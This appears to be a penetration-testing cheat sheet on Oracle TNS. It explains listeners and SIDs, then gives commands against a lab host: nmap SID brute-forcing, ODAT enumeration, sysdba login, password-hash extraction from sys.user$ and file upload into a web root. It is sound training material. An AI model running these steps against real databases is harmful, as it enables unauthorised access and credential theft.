Oracle TNS
The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks.. Default Oracle TNS port is TCP/1521, but can be easily changed. The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. Each database or service has a unique entry in the tnsnames.ora file, containing the necessary information for clients to connect to the service. In Oracle RDBMS, a System Identifier (SID
) is a unique name that identifies a particular database instance. It can have multiple instances, each with its own System ID. An instance is a set of processes and memory structures that interact to manage the database's data. When a client connects to an Oracle database, it specifies the database's SID along with its connection string. The client uses this SID to identify which database instance it wants to connect to
PLSQL Exclusion List
Oracle databases can be protected by using so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution.
ODAT
Oracle Database Attacking Tool (ODAT
) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.
Tips2Hack
Nmap
sudo nmap -p1521 -sV 13.13.13.13 --open
Nmap - SID Bruteforcing
sudo nmap -p1521 -sV 13.13.13.13 --open --script oracle-sid-brute
ODAT
./odat.py all -s 13.13.13.13
SQLplus - Log In
sqlplus george/burger@13.13.13.13/XE
Oracle RDBMS - Interaction
SQL> select table_name from all_tables;
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
GEORGE CONNECT NO YES NO
GEORGE RESOURCE NO YES NO
Oracle RDBMS - Database Enumeration
sqlplus george/burger@13.13.13.13/XE as sysdba
SQL> select * from user_role_privs;
-------------------------------------------------------------------------
USERNAME GRANTED_ROLE ADM DEF OS
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
SYS APEX_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO
SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO
SYS DBA YES YES NO
SYS DBFS_ROLE YES YES
-------------------------------------------------------------------------
Oracle RDBMS - Extract Password Hashes
SQL> select name, password from sys.user$;
Oracle RDBMS - File Upload
./odat.py utlfile -s 13.13.13.13 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://13.13.13.13/testing.txt
Hello There Adventurer!
Last updated